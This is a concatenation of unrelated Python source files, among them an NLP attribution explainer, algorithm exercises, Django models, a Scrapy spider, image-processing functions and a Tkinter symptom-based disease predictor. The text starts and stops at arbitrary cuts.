self.tokenizer.convert_ids_to_tokens(input_ids[0]) def run(self, text: str = None, index: int = None, class_name: str = None): if text is not None: self.text = text self._calculate_attributions(index=index, class_name=class_name) return self.attributions def _forward(self, input_ids): preds = self.model(input_ids)[0] self.pred_probs = torch.softmax(preds, dim=1)[0][1] return torch.softmax(preds, dim=1)[0][self.selected_index].unsqueeze(-1) @property def predicted_class_index(self): if self.input_ids is not None: preds = self.model(self.input_ids)[0] self.pred_class = torch.argmax(torch.softmax(preds, dim=0)[0]) return torch.argmax(torch.softmax(preds, dim=1)[0]).cpu().detach().numpy() else: raise InputIdsNotCalculatedError( "input_ids have not been created yet. Please call `get_attributions()`" ) @property def predicted_class_name(self): try: index = self.predicted_class_index return self.id2label[int(index)] except ValueError: return self.predicted_class_index def visualize(self, html_filepath: str = None, true_class: str = None): tokens = [token.replace("Ġ","") for token in self.decode(self.input_ids)] attr_class = self.id2label[int(self.selected_index)] if true_class is None: true_class = self.predicted_class_name score_viz = self.attributions.visualize_attributions( self.pred_probs, self.predicted_class_name, true_class, attr_class, self.text, tokens, ) html = viz.visualize_text([score_viz]) if html_filepath: if not html_filepath.endswith(".html"): html_filepath = html_filepath + ".html" with open(html_filepath, "w") as html_file: html_file.write(html.data) def _calculate_attributions(self, index: int = None, class_name: str = None): ( self.input_ids, self.ref_input_ids, self.sep_idx, ) = self._make_input_reference_pair(self.text) if index is not None: self.selected_index = index elif class_name is not None: if class_name in self.label2id.keys(): self.selected_index = self.label2id[class_name] else: s = f"'{class_name}' is not found in self.label2id keys." s += "Defaulting to predicted index instead." warnings.warn(s) self.selected_index = self.predicted_class_index else: self.selected_index = self.predicted_class_index if self.attribution_type == "lig": embeddings = getattr(self.model, self.model_prefix).embeddings # embeddings = self.model.get_input_embeddings() # embeddings = getattr(self.model, self.model_prefix).get_input_embeddings() reference_tokens = [token.replace("Ġ","") for token in self.decode(self.input_ids)] lig = LIGAttributions( self._forward, embeddings, reference_tokens, self.input_ids, self.ref_input_ids, self.sep_idx, ) lig.summarize() self.attributions = lig else: pass def __call__(self, text: str = None, index: int = None, class_name: str = None): return self.run(text, index, class_name) def __str__(self): s = f"{self.__class__.__name__}(" s += f'\n\ttext="{str(self.text[:10])}...",' s += f"\n\tmodel={self.model.__class__.__name__}," s += f"\n\ttokenizer={self.tokenizer.__class__.__name__}," s += f"\n\tattribution_type='{self.attribution_type}'," s += ")" return s
# N개의 정수로 이루어진 수열이 있을 때, 길이가 양수인 부분수열 중에서 # 그 수열의 원소를 다 더한 값이 S가 되는 경우의 수를 구하는 프로그램을 작성하시오. # # 입력 # 첫째 줄에 정수의 개수를 나타내는 N과 정수 S가 주어진다. # (1 ≤ N ≤ 40, |S| ≤ 1,000,000) # # 둘째 줄에 N개의 정수가 빈 칸을 사이에 두고 주어진다. # 주어지는 정수의 절댓값은 100,000을 넘지 않는다. # # 출력 # 첫째 줄에 합이 S가 되는 부분수열의 개수를 출력한다. from sys import stdin N, S = map(int, stdin.readline().rstrip().split()) nums = list(map(int, stdin.readline().rstrip().split())) answer = 0 def sub_sums(arg_index, arg_sum): global answer if arg_index >= N: if arg_sum == S: answer += 1 return sub_sums(arg_index + 1, arg_sum) sub_sums(arg_index + 1, arg_sum + nums[arg_index]) sub_sums(0, 0) # 공집합 제거 (문제의 조건 중 "길이가 양수인 부분수열 중에서" 에 해당) if S == 0: answer -= 1 print(answer)
#!/usr/bin/env python # -*- coding: utf-8 -*- import six from .utils import package_names_match class Fetcher(six.Iterator): """Base fetch implementation to apply requirement filtering. """ def __init__(self, repository, package_name): self._repository = repository self._package_name = package_name def __repr__(self): return "Fetcher({endpoint!r}, {package_name!r})".format( endpoint=self._repository.base_endpoint.value, package_name=self._package_name, ) def __iter__(self): return self def __aiter__(self): return self def iter_endpoints(self): for endpoint in self._repository.iter_endpoints(self._package_name): yield endpoint def iter_entries(self, endpoint, source): name = self._package_name for entry in self._repository.get_entries(name, endpoint, source): if package_names_match(entry.name, name): yield entry
# 03_02-Callable Instances from resolver import Resolver resolve = Resolver() resolve('localhost') resolve.__call__('localhost') resolve._cache resolve('sixty-north.com') resolve.__call__('sixty-north.com') resolve._cache resolve('pluralsight.com') resolve._cache from timeit import timeit timeit(setup='from __main__ import resolve', stmt="resolve('localhost')", number=1) timeit(setup='from __main__ import resolve', stmt="resolve('localhost')", number=1) timeit(setup='from __main__ import resolve', stmt="resolve('python.org')", number=1) timeit(setup='from __main__ import resolve', stmt="resolve('python.org')", number=1) print("{:f}".format(_)) exit() from resolver import Resolver resolve = Resolver() resolve.has_host('localhost') resolve('localhost') resolve.has_host('localhost') resolve.clear() resolve.has_host('localhost') resolve.has_host('pluralsight.com') resolve('pluralsight.com') resolve.has_host('pluralsight.com') resolve.clear() resolve.has_host('pluralsight.com')
""" Trainer to create a model """ # import json # import logging from pandas import DataFrame from sklearn.model_selection import train_test_split import xgboost as xgb from infrastructure.data_mining.xgboost.XGBRegresser import XGBRegresser class XGBoostDataTrainer: EARLY_STOP = 50 RANDOM_STATE = 42 VAL_RATIO = 0.3 def __init__(self, regresser: XGBRegresser): self._regresser = regresser def train(self, data_frame: DataFrame, params: list = None): data_y = data_frame.iloc[:, 0] data_x = data_frame.iloc[:, 1:] x_train, x_val, y_train, y_val = train_test_split(data_x, data_y, test_size=self.VAL_RATIO, random_state=self.RANDOM_STATE) data_train = xgb.DMatrix(x_train, y_train) data_validate = xgb.DMatrix(x_val, y_val) watchlist = [(data_train, 'train'), (data_validate, 'validate')] # if params is None: # params = self._regresser.randomized_search_cv(x_train, y_train, data_x, data_y) # logging.critical(json.dumps(params)) params = {'objective': 'reg:linear', 'subsample': 0.8, 'colsample_bytree': 0.85, 'seed': 42, 'max_depth': 23, 'n_estimators': 364} return xgb.train(params, data_train, evals=watchlist, early_stopping_rounds=self.EARLY_STOP,)
# Name: Efi Pecani # ID: 307765230 from tkinter import * #import all of this stuff in order to wor kwith tkinter methods import tkinter as tk from tkinter import filedialog from tkinter import ttk from PIL import ImageTk , ImageFilter from PIL import Image import os, sys import tkinter.font as tkFont #_________________________________________________ def rotatePicture(sourceImagePath, targetImagePath): #1st function im = Image.open(sourceImagePath)#.convert('L') w,h = im.size new = im.copy() mat = im.load() mat_new = new.load() for i in range(w): for j in range(h): mat_new[i,j] =mat[w-i-1,h-j-1] if targetImagePath != "": new.save(targetImagePath) print("saved") else: return new #______________________________________________ def mirrorPicture(sourceImagePath, targetImagePath): #2nd function im = Image.open(sourceImagePath)#.convert('L') optional for gray image w,h = im.size new = im.copy() mat = im.load() mat_new = new.load() for i in range(w): for j in range(h): mat_new[i,j] = mat[w-i-1,j] if targetImagePath != "": new.save(targetImagePath) print("saved") else: return new #_________________________________________________ def resizePicture(sourceImagePath, targetImagePath): #3rd function im = Image.open(sourceImagePath).convert('L') w,h = im.size #w=int(w/2) #h=int(h/2) mat = im.load()#im.copy()# newpic = Image.new('L', (int(w/2), int(h/2))) newmat = newpic.load() for x in range(int(w/2)): for y in range(int(h/2)): newmat[x,y] = (mat[x*2, y*2]+mat[x*2+1, y*2]+mat[x*2, y*2+1]+mat[x*2+1, y*2+1]//4) # newdata[x,y]=(0) if targetImagePath != "": newpic.save(targetImagePath) # print("saved") for self checking else: return newpic #_________________________________________________ def edge(sourceImagePath, targetImagePath ,threshold): #4th function im = Image.open(sourceImagePath).convert('L') w,h = im.size data = im.load() new = Image.new('L', (w, h)) newdata = new.load() for i in range(w-1): for j in range(1, h): if abs(data[i, j]-data[i+1, j]) > threshold or abs(data[i, j]-data[i, j-1]) > threshold: newdata[i, j] = 255 else: newdata[i, j] = 0 if targetImagePath != "": #the condition new.save(targetImagePath) print("saved") else: return new #_________________________________________________ def MyAlgorithm1(sourceImagePath,targetImagePath):# 5th function create a Primary Colors version of the image im = Image.open(sourceImagePath) width, height = im.size new =im.copy() new = Image.new("RGB", (width, height), "white") pixels = new.load() # Transform to primary for i in range(width): for j in range(height): pixel = get_pixel(im, i, j)# Get Pixel red = pixel[0] # Get R, G, B values (This are int from 0 to 255) green = pixel[1] blue = pixel[2] if red > 127:# Transform to primary red = 255 else: red = 0 if green > 127: green = 255 else: green = 0 if blue > 127: blue = 255 else: blue = 0 pixels[i, j] = (int(red), int(green), int(blue)) #sets pixel in new image if targetImagePath != "": #the condition for saving-->if saved button was pressed should work new.save(targetImagePath) print("saved") else: return new #_________________________________________________ def MyAlgorithm2(sourceImagePath,targetImagePath):# 5th function im = Image.open(sourceImagePath) #creates a Half-tone version of the image width, height = im.size # new =im.copy() new = Image.new("RGB", (width, height), "white") pixels = new.load() for i in range(0, width, 2):# transform to half tones for j in range(0, height, 2): p1 = get_pixel(im, i, j) # get Pixels p2 = get_pixel(im, i, j + 1) p3 = get_pixel(im, i + 1, j) p4 = get_pixel(im, i + 1, j + 1) gray1 = (p1[0] * 0.299) + (p1[1] * 0.587) + (p1[2] * 0.114) # Transform to grayscale gray2 = (p2[0] * 0.299) + (p2[1] * 0.587) + (p2[2] * 0.114) gray3 = (p3[0] * 0.299) + (p3[1] * 0.587) + (p3[2] * 0.114) gray4 = (p4[0] * 0.299) + (p4[1] * 0.587) + (p4[2] * 0.114) sat = (gray1 + gray2 + gray3 + gray4) / 4 # saturation percentage ("revaya shel gavan") if sat > 223: pixels[i, j] = (255, 255, 255) # White pixels[i, j + 1] = (255, 255, 255) # White pixels[i + 1, j] = (255, 255, 255) # White pixels[i + 1, j + 1] = (255, 255, 255) # White elif sat > 159: pixels[i, j] = (255, 255, 255) # White pixels[i, j + 1] = (0, 0, 0) # Black pixels[i + 1, j] = (255, 255, 255) # White pixels[i + 1, j + 1] = (255, 255, 255) # White elif sat > 95: pixels[i, j] = (255, 255, 255) # White pixels[i, j + 1] = (0, 0, 0) # Black pixels[i + 1, j] = (0, 0, 0) # Black pixels[i + 1, j + 1] = (255, 255, 255) # White elif sat > 32: pixels[i, j] = (0, 0, 0) # Black pixels[i, j + 1] = (255, 255, 255) # White pixels[i + 1, j] = (0, 0, 0) # Black pixels[i + 1, j + 1] = (0, 0, 0) # Black else: pixels[i, j] = (0, 0, 0) # Black pixels[i, j + 1] = (0, 0, 0) # Black pixels[i + 1, j] = (0, 0, 0) # Black pixels[i + 1, j + 1] = (0, 0, 0) # Black if targetImagePath != "": new.save(targetImagePath) print("saved") else: return new #_________________________________________________ def gaussBlur(sourceImagePath, targetImagePath): #6th extra functions built in just for fun and color im = Image.open(sourceImagePath) new = im.copy() new=new.filter(ImageFilter.GaussianBlur(20)) if targetImagePath != "": new.save(targetImagePath) print("saved") else: return new #_________________________________________________ def minFilter(sourceImagePath, targetImagePath): #7th function extra fact=7 im = Image.open(sourceImagePath) new = im.copy() new=new.filter(ImageFilter.MinFilter(fact)) if targetImagePath != "": new.save(targetImagePath) print("saved") else: return new #_________________________________________________ def sharpen(sourceImagePath, targetImagePath): #8th function extra im = Image.open(sourceImagePath) new = im.copy() new=new.filter(ImageFilter.UnsharpMask) if targetImagePath != "": new.save(targetImagePath) print("saved") else: return new #_________________________________________________ def contour(sourceImagePath, targetImagePath): #9th function extra im = Image.open(sourceImagePath) new = im.copy() new=new.filter(ImageFilter.CONTOUR) if targetImagePath != "": new.save(targetImagePath) print("saved") else: return new #_________________________________________________ def detail(sourceImagePath, targetImagePath): #10th function extra im = Image.open(sourceImagePath) new = im.copy() new=new.filter(ImageFilter.DETAIL) if targetImagePath != "": new.save(targetImagePath) print("saved") else: return new #_________________________________________________ def edgeEnhanceMore(sourceImagePath, targetImagePath): #11th function extra im = Image.open(sourceImagePath) new = im.copy() new=new.filter(ImageFilter.EDGE_ENHANCE_MORE) if targetImagePath != "": new.save(targetImagePath) print("saved") else: return new #_________________________________________________ def emboss(sourceImagePath, targetImagePath): #12th function extra im = Image.open(sourceImagePath) new = im.copy() new=new.filter(ImageFilter.EMBOSS) if targetImagePath != "": new.save(targetImagePath) print("saved") else: return new #_________________________________________________ def kernelSmooth(sourceImagePath, targetImagePath): #13th function extra im = Image.open(sourceImagePath) new = im.copy() new=new.filter(ImageFilter.Kernel((3, 3), [1, 2, 1, 2, 4, 2, 1, 2, 1], 16)) if targetImagePath != "": new.save(targetImagePath) print("saved") else: return new #_________________________________________________ '''@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Auxilary Functions @@@@@@@@@@''' #_________________________________________________ def add(sourceImagePath,k): #learning from the class im = Image.open(sourceImagePath).convert('L') w,h = im.size new = im.copy() mat = im.load() mat_new = new.load() for x in range(w): for y in range(h): mat_new[x,y] = min((mat[x,y]+k), 256) return new #_______________________________________ def open_image(path):# Open an Image newImage = Image.open("./my_image.jpg") return newImage #_______________________________________ def save_image(image, path):# Save Image image.save(path, 'jpg') #_______________________________________ def create_image(i, j): image = Image.new("RGB", (i, j), "white") return image #_______________________________________ def get_pixel(image, i, j):# Get the pixel from the given image # Inside image bounds? width, height = image.size if i > width or j > height: return None # get Pixel pixel = image.getpixel((i, j)) return pixel #_______________________________________ path="./my_image1.jpg" target="./newIm.jpg" # display #newIm=rotatePicture(path, target)# עובד #newIm=mirrorPicture(path, target) עובד #newIm= edge (path, target,15 ) # עובד #newIm= gaussBlur(path, target) #עובד #im = Image.open(path) #newIm=im.copy() #newIm=resizePicture(path,"") #עובד #newIm.show() #newPic.show()
r = int(input('Quanto dinheiro você tem na carteira?R$')) d= r/5.20 print(f'Com R${r} você pode comprar ${d:.2f} doláres')
from pathlib import Path import os from loop_directory import loop_bulks def loop_folders(chunks: list, Archived=False): for chunk in chunks: loop_bulks(chunk, Archived) def chunks(paths: list, n): return [paths[i*n:(i+1)*n] for i in range((len(paths) + n - 1) // n)] if __name__ == '__main__': path = Path.cwd() / 'dl' #print(path) path_archive = list(path.glob('**/ARCHIVE_SALES_*.dat')) ##archive_stem = list(map(lambda path: path.stem, path_archive)) archived_chunks = chunks(path_archive,5) ## path_current = list(path.glob('**/*_SALES_DATA_NNME_*.dat')) ## current_stem = list(map(lambda path: path.stem, path_current)) ## print(len(list(current_stem))) path_current1 = list(path.glob('**/*_SALES_DATA_*.dat')) current_chunks = chunks(path_current1, 1000) ##print(chunks[0]) ##current1_stem = list(map(lambda path: path.stem, path_current1)) loop_folders(archived_chunks, True) loop_folders(current_chunks) ##print(len(list(current1_stem))) # missing = [] # for item in current1_stem: # if item not in current_stem: # missing.append(item) # print(missing) # These three files are named differently from the others ['656_SALES_DATA_08072019', '666_SALES_DATA_08072019', '708_SALES_DATA_08072019'] # under 2019/2019708
# Generated by Django 2.0.2 on 2018-02-19 03:52 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('weblog', '0001_initial'), ] operations = [ migrations.AlterField( model_name='author', name='email', field=models.EmailField(blank=True, max_length=254), ), migrations.AlterField( model_name='blog', name='tagline', field=models.TextField(blank=True), ), migrations.AlterField( model_name='entry', name='authors', field=models.ManyToManyField(blank=True, to='weblog.Author'), ), migrations.AlterField( model_name='entry', name='mod_date', field=models.DateField(auto_now=True), ), migrations.AlterField( model_name='entry', name='n_comments', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='entry', name='n_pingbacks', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='entry', name='rating', field=models.IntegerField(default=0), ), ]
''' 堆排序 ''' def sort(array): # 遍历非叶子节点,建立堆结构数组 for i in range(int(len(array) / 2) - 1, -1, -1): adjustHeap(array, i, len(array)) print('arr of heap:', array) # 堆积树建立完成,开始排序。 for j in range(len(array) - 1, 0, -1): # 一开始最大元素是[0],然后被换到最后一个 # 从n-0,不断和[0]元素交换,重新堆排序(既把第2、3..n大的翻转到最上面) array[0], array[j] = array[j], array[0] adjustHeap(array, 0, j) def adjustHeap(array, i, length): # 对第i号进行堆调整 # 获取非叶子节点的数据 temp = array[i] # 非叶子节点的左子节点 k = 2 * i + 1 # 遍历对比k后面的节点,把temp放入合理位置 while k < length: # k + 1 < length 确保有左右节点才比较 if k + 1 < length and array[k] < array[k + 1]: # 如果左子节点比右子节点小,k就切换到右子节点 k += 1 # 如果子节点有更大的 if array[k] > temp: # 父节点替换为更大的 array[i] = array[k] # 记录当前最大点位置 i = k else: # 直接打断,因为堆特点,后面层的更不满足 break # k切换到下一个左子节点 k = 2 * k + 1 # 此时i是空位,i上层的都比temp大,temp放到这里 array[i] = temp print('<iframe src="//player.bilibili.com/player.html?aid=328695051&bvid=BV1qA411i7pb&cid=207978874&page=1" scrolling="no" border="0" frameborder="no" framespacing="0" allowfullscreen="true"> </iframe>') if __name__ == '__main__': data = [16, 25, 39, 27, 12, 8, 45, -10, 63] print('arr', data) print('start max heap sort') sort(data) print('arr sorted:', data) # ------------------------------------------------------------------------------ # 第二版 获取最小k个元素 class Solution4: @staticmethod def swap(nums, i, j): nums[i], nums[j] = nums[j], nums[i] def heapify(self, nums, i, size): # i从0开始,left则为左孩子 left, right = 2 * i + 1, 2 * i + 2 largest = i # left < size说明有左孩子 if left < size and nums[left] > nums[largest]: largest = left if right < size and nums[right] > nums[largest]: largest = right if largest != i: # 进行完下面这个swap就把当前这棵树的最大值放到了根结点处 self.swap(nums, i, largest) # ?? self.heapify(nums, largest, size) def build_heap(self, nums, k): # 从最后一个非叶子节点开始堆化 for i in range(k // 2 - 1, -1, -1): self.heapify(nums, i, k) def getLeastNumbers(self, arr, k: int): if not arr or k <= 0: return [] if len(arr) <= k: return arr heap = arr[:k] self.build_heap(heap, k) for i in range(k, len(arr)): if arr[i] < heap[0]: heap[0] = arr[i] self.heapify(heap, 0, k) return heap
# Time-complexity: O(N) class Solution: def kthFactor(self, n: int, k: int) -> int: if k == 1: return 1 cnt = 1 for factor in range(2, n // 2 + 1): if n % factor == 0: cnt += 1 if cnt == k: return factor if cnt+1 == k: return n return -1 # Time-complexity: O(logN) class Solution: def kthFactor(self, n: int, k: int) -> int: for i in range(1, int(n ** 0.5) + 1): if n % i == 0: k -= 1 if k == 0: return i for i in range(int(n ** 0.5), 0, -1): if i * i == n: continue if n % i == 0: k -= 1 if k == 0: return n // i return -1
# -*- coding: utf-8 -*- import scrapy import io import sys import os from scrapy.selector import HtmlXPathSelector from ..items import Sp1Item from scrapy.http import Request sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='gb18030') class ChoutiSpider(scrapy.Spider): name = 'chouti' allowed_domains = ['chouti.com'] start_urls = ['http://dig.chouti.com/'] def parse(self, response): # print(response.text) hxs = HtmlXPathSelector(response) # reslt = hxs.select('//div[@id="yellow-msg-box-intohot"]') #[<HtmlXPathSelector xpath='//div[@id="yellow-msg-box-intohot"]' data='<div class="yellow-comment-msg-box" id="'>] item_list = hxs.select('//div[@id="content-list"]/div[@class="item"]') # [<HtmlXPathSelector xpath='//div[@id="yellow-msg-box-intohot"]' data='<div class="yellow-comment-msg-box" id="'>] for item in item_list: title = item.select('./div[@class="news-content"]/div[@class="part2"]/@share-title').extract_first() url = item.select('./div[@class="news-content"]/div[@class="part2"]/@share-pic').extract_first() # print(v) obj = Sp1Item(title=title, url=url) yield obj # # hxs.select('//div[@id="dig_lcpage"]//a/@href').extract() # page_url_list = hxs.select('//div[@id="dig_lcpage"]//a[re:test(@href,"/all/hot/recent/\d+")]/@href').extract() # for url in page_url_list: # url = "http://dig.chouti.com" + url # obj = Request(url=url,callback=self.parse) # yield obj # #此时递归了 一直查找
from django import forms from cb.models import User class UserForm(forms.ModelForm): class Meta: model = User fields = ['name', 'password', 'email'] labels = {'name':'用戶名', 'password':'密碼', 'email':'郵箱'}
from django.contrib import admin # Register your models here. from .models import Post,calci,book,books # Register your models here. admin.site.register(Post) admin.site.register(calci) admin.site.register(book) admin.site.register(books)
import csv, pickle from nltk.corpus import stopwords stwords = stopwords.words('english') radlex_terms_1word = [] radlex_terms_2word = [] with open('./radlex/Radlex.csv') as csvfile: lexreader = csv.reader(csvfile, delimiter=',') for row in lexreader: for rowi in row[0].split(): try: rowia = rowi.rstrip().encode('ascii', 'ignore').lower() except: continue if rowia not in radlex_terms_1word and rowia not in stwords\ and not rowia.isdigit(): radlex_terms_1word.append(rowia) row0 = row[0].split() for rid in range(len(row0)-1): rowi2 = ' '.join(row0[rid:rid+2]) try: rowi2a = rowi2.rstrip().encode('ascii', 'ignore').lower() except: continue if rowi2a not in radlex_terms_2word: stwordext = False for rowi2ai in rowi2a.split(): if rowi2ai in stwords: stwordext = True if stwordext: pass else: radlex_terms_2word.append(rowi2a) radlex_terms = {'1word': radlex_terms_1word, '2word': radlex_terms_2word} with open('radlex_terms.pkl', 'wb') as handle: pickle.dump(radlex_terms, handle)
from tkinter import * import numpy as np import pandas as pd from PIL import ImageTk,Image from tkinter import filedialog AGE= ['0','1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41','42','43','44','45','46','47','48','49','50','51','52','53','54','55','56','57','58','59','60','61','62','63','64','65','66','67','68','69','70'] GENDER= ['MALE','FEMALE'] SYMPTOMPS=['back_pain','constipation','abdominal_pain','diarrhoea','mild_fever','yellow_urine', 'yellowing_of_eyes','acute_liver_failure','fluid_overload','swelling_of_stomach', 'swelled_lymph_nodes','malaise','blurred_and_distorted_vision','phlegm','throat_irritation', 'redness_of_eyes','sinus_pressure','runny_nose','congestion','chest_pain','weakness_in_limbs', 'fast_heart_rate','pain_during_bowel_movements','pain_in_anal_region','bloody_stool', 'irritation_in_anus','neck_pain','dizziness','cramps','bruising','obesity','swollen_legs', 'swollen_blood_vessels','puffy_face_and_eyes','enlarged_thyroid','brittle_nails', 'swollen_extremeties','excessive_hunger','extra_marital_contacts','drying_and_tingling_lips', 'slurred_speech','knee_pain','hip_joint_pain','muscle_weakness','stiff_neck','swelling_joints', 'movement_stiffness','spinning_movements','loss_of_balance','unsteadiness', 'weakness_of_one_body_side','loss_of_smell','bladder_discomfort','foul_smell_of urine', 'continuous_feel_of_urine','passage_of_gases','internal_itching','toxic_look_(typhos)', 'depression','irritability','muscle_pain','altered_sensorium','red_spots_over_body','belly_pain', 'abnormal_menstruation','dischromic _patches','watering_from_eyes','increased_appetite','polyuria','family_history','mucoid_sputum', 'rusty_sputum','lack_of_concentration','visual_disturbances','receiving_blood_transfusion', 'receiving_unsterile_injections','coma','stomach_bleeding','distention_of_abdomen', 'history_of_alcohol_consumption','fluid_overload','blood_in_sputum','prominent_veins_on_calf', 'palpitations','painful_walking','pus_filled_pimples','blackheads','scurring','skin_peeling', 'silver_like_dusting','small_dents_in_nails','inflammatory_nails','blister','red_sore_around_nose', 'yellow_crust_ooze'] disease=['Fungal infection','Allergy','GERD','Chronic cholestasis','Drug Reaction', 'Peptic ulcer diseae','AIDS','Diabetes','Gastroenteritis','Bronchial Asthma','Hypertension', ' Migraine','Cervical spondylosis', 'Paralysis (brain hemorrhage)','Jaundice','Malaria','Chicken pox','Dengue','Typhoid','hepatitis A', 'Hepatitis B','Hepatitis C','Hepatitis D','Hepatitis E','Alcoholic hepatitis','Tuberculosis', 'Common Cold','Pneumonia','Dimorphic hemmorhoids(piles)', 'Heartattack','Varicoseveins','Hypothyroidism','Hyperthyroidism','Hypoglycemia','Osteoarthristis', 'Arthritis','(vertigo) Paroymsal Positional Vertigo','Acne','Urinary tract infection','Psoriasis', 'Impetigo'] l2=[] for x in range(0,len( SYMPTOMPS)): l2.append(0) # TRAINING DATA tr -------------------------------------------------------------------------------- tr=pd.read_csv("Symptom_Testing.csv") tr.replace({'prognosis':{'Fungal infection':0,'Allergy':1,'GERD':2,'Chronic cholestasis':3,'Drug Reaction':4, 'Peptic ulcer diseae':5,'AIDS':6,'Diabetes ':7,'Gastroenteritis':8,'Bronchial Asthma':9,'Hypertension ':10, 'Migraine':11,'Cervical spondylosis':12, 'Paralysis (brain hemorrhage)':13,'Jaundice':14,'Malaria':15,'Chicken pox':16,'Dengue':17,'Typhoid':18,'hepatitis A':19, 'Hepatitis B':20,'Hepatitis C':21,'Hepatitis D':22,'Hepatitis E':23,'Alcoholic hepatitis':24,'Tuberculosis':25, 'Common Cold':26,'Pneumonia':27,'Dimorphic hemmorhoids(piles)':28,'Heart attack':29,'Varicose veins':30,'Hypothyroidism':31, 'Hyperthyroidism':32,'Hypoglycemia':33,'Osteoarthristis':34,'Arthritis':35, '(vertigo) Paroymsal Positional Vertigo':36,'Acne':37,'Urinary tract infection':38,'Psoriasis':39, 'Impetigo':40}},inplace=True) X_test= tr[SYMPTOMPS] y_test = tr[["prognosis"]] np.ravel(y_test) # ------------------------------------------------------------------------------------------------------ # TESTING DATA df ------------------------------------------------------------------------------------- df=pd.read_csv("Symptom_Training.csv") df.replace({'prognosis':{'Fungal infection':0,'Allergy':1,'GERD':2,'Chronic cholestasis':3,'Drug Reaction':4, 'Peptic ulcer diseae':5,'AIDS':6,'Diabetes ':7,'Gastroenteritis':8,'Bronchial Asthma':9,'Hypertension ':10, 'Migraine':11,'Cervical spondylosis':12, 'Paralysis (brain hemorrhage)':13,'Jaundice':14,'Malaria':15,'Chicken pox':16,'Dengue':17,'Typhoid':18,'hepatitis A':19, 'Hepatitis B':20,'Hepatitis C':21,'Hepatitis D':22,'Hepatitis E':23,'Alcoholic hepatitis':24,'Tuberculosis':25, 'Common Cold':26,'Pneumonia':27,'Dimorphic hemmorhoids(piles)':28,'Heart attack':29,'Varicose veins':30,'Hypothyroidism':31, 'Hyperthyroidism':32,'Hypoglycemia':33,'Osteoarthristis':34,'Arthritis':35, '(vertigo) Paroymsal Positional Vertigo':36,'Acne':37,'Urinary tract infection':38,'Psoriasis':39, 'Impetigo':40}},inplace=True) X= df[SYMPTOMPS] y = df[["prognosis"]] np.ravel(y) # DECISION TREE ALGORITHM (PREDICTION1) def DecisionTree(): from sklearn import tree clf3 = tree.DecisionTreeClassifier() clf3 = clf3.fit(X,y) from sklearn.metrics import accuracy_score y_pred=clf3.predict(X_test) print(accuracy_score(y_test, y_pred)) print(accuracy_score(y_test, y_pred,normalize=False)) psymptoms = [Symptom1.get(),Symptom2.get(),Symptom3.get(),Symptom4.get(),Symptom5.get()] for k in range(0,len(SYMPTOMPS)): for z in psymptoms: if(z==SYMPTOMPS[k]): l2[k]=1 inputtest = [l2] predict = clf3.predict(inputtest) predicted=predict[0] h='no' for a in range(0,len(disease)): if(predicted == a): h='yes' break if (h=='yes'): t1.delete("1.0", END) t1.insert(END, disease[a]) else: t1.delete("1.0", END) t1.insert(END, "Not Found") #RANDOM FOREST (PREDICTION2) def randomforest(): from sklearn.ensemble import RandomForestClassifier clf4 = RandomForestClassifier() clf4 = clf4.fit(X,np.ravel(y)) from sklearn.metrics import accuracy_score y_pred=clf4.predict(X_test) print(accuracy_score(y_test, y_pred)) print(accuracy_score(y_test, y_pred,normalize=False)) psymptoms = [Symptom1.get(),Symptom2.get(),Symptom3.get(),Symptom4.get(),Symptom5.get()] for k in range(0,len(SYMPTOMPS)): for z in psymptoms: if(z== SYMPTOMPS[k]): l2[k]=1 inputtest = [l2] predict = clf4.predict(inputtest) predicted=predict[0] h='no' for a in range(0,len(disease)): if(predicted == a): h='yes' break if (h=='yes'): t2.delete("1.0", END) t2.insert(END, disease[a]) else: t2.delete("1.0", END) t2.insert(END, "Not Found") #NAIVES BAYES (PREDICTION3) def NaiveBayes(): from sklearn.naive_bayes import GaussianNB gnb = GaussianNB() gnb=gnb.fit(X,np.ravel(y)) from sklearn.metrics import accuracy_score y_pred=gnb.predict(X_test) print(accuracy_score(y_test, y_pred)) print(accuracy_score(y_test, y_pred,normalize=False)) psymptoms = [Symptom1.get(),Symptom2.get(),Symptom3.get(),Symptom4.get(),Symptom5.get()] for k in range(0,len(SYMPTOMPS)): for z in psymptoms: if(z==SYMPTOMPS[k]): l2[k]=1 inputtest = [l2] predict = gnb.predict(inputtest) predicted=predict[0] h='no' for a in range(0,len(disease)): if(predicted == a): h='yes' break if (h=='yes'): t3.delete("1.0", END) t3.insert(END, disease[a]) else: t3.delete("1.0", END) t3.insert(END, "Not Found") #main gui------------------------------------------------------------------------------------ root = Tk() def open_img(): x=openfn() img = Image.open(x) img = img.resize((250, 250), Image.ANTIALIAS) img = ImageTk.PhotoImage(img) print(img) panel = Label(root, image = img) panel.image = img panel.grid(row = 3) def openfn(): filename = filedialog.askopenfilename(title ='open') return filename def openNewWindow(): newWindow = Toplevel(root) root.resizable(width = True, height = True) newWindow.title("Image Disease Prediction") newWindow.geometry("500x300") Label(newWindow, text ="Please Upload Patient Image").pack() btn = Button(newWindow, text ='open image', command = open_img ).pack() btn.grid(row = 1, column=3) root.mainloop() Symptom1 = StringVar() Symptom1.set(None) Symptom2 = StringVar() Symptom2.set(None) Symptom3 = StringVar() Symptom3.set(None) Symptom4 = StringVar() Symptom4.set(None) Symptom5 = StringVar() Symptom5.set(None) Name_Surname = StringVar() Height= IntVar() Weight = IntVar() Gender = StringVar() Gender.set(None) Age = IntVar() Age.set(None) w2 = Label(root, justify=LEFT, text="PATIENT", fg="red") w2.config(font=("Elephant", 12)) w2.grid(row=1, column=0, columnspan=1, padx=100) w2 = Label(root, justify=LEFT, text="Name Surname:", fg="black") w2.config(font=("Elephant", 12)) w2.grid(row=2, column=0, columnspan=2, padx=100) t1 = Text(root, height=1, width=20,fg="black") t1.grid(row=2, column=1, padx=10) w2 = Label(root, justify=LEFT, text="Height:", fg="black") w2.config(font=("Elephant", 12)) w2.grid(row=3, column=0, columnspan=2, padx=100) t1 = Text(root, height=1, width=20,fg="black") t1.grid(row=3, column=1, padx=10) w2 = Label(root, justify=LEFT, text="Weight:", fg="black") w2.config(font=("Elephant", 12)) w2.grid(row=4, column=0, columnspan=2, padx=100) t1 = Text(root, height=1, width=20,fg="black") t1.grid(row=4, column=1, padx=10) S1Lb = Label(root, text=" Big/Small Tension:", fg="black") S1Lb.grid(row=11, column=1, padx=10, 